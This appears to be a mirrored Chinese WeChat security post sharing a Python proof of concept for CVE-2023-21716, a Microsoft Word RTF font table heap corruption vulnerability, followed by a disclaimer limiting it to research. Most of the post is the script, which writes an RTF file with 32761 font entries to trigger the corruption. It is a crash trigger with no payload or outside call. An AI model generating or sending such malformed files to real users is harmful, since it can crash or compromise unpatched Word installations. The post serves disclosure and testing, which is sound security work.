Skip to content

Latest commit

 

History

History
92 lines (40 loc) · 1.37 KB

[孑蝉]-2023-3-9-POC | CVE-2023-21716 Microsoft Word 远程代码执行漏洞.md

File metadata and controls

92 lines (40 loc) · 1.37 KB

POC | CVE-2023-21716 Microsoft Word 远程代码执行漏洞

程橙橙 孑蝉

孑蝉

微信号 jiechan-aci

功能介绍 个人公众号,专注于安全研究,致力于高质量技术分享。


__发表于

收录于合集 #漏洞 3个

​python3

PoC for:

Microsoft Word RTF Font Table Heap Corruption Vulnerability

by Joshua J. Drake (@jduck)

import sys

allow overriding the number of fonts

num = 32761

if len(sys.argv) > 1:

    num = int(sys.argv[1])

f = open("tezt.rtf", "wb")

f.write(b"{\\rtf1{\n{\\fonttbl")

for i in range(num):

    f.write(b"{\\\f%dA;}\n" % i)

f.write(b"}\n")

f.write(b"{\\rtlch it didn't crash?? no calc?! BOO!!!}\n")

f.write(b"}}\n")

f.close()

POC仅用于安全自检,请勿用于非法用途。

本文仅供技术学习、交流、研究使用,切勿用于非法活动。造成任何直接、间接损害,皆由使用者负责,公众号及笔者不承担任何责任。

预览时标签不可点

微信扫一扫
关注该公众号

知道了

微信扫一扫
使用小程序


取消 允许


取消 允许

: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看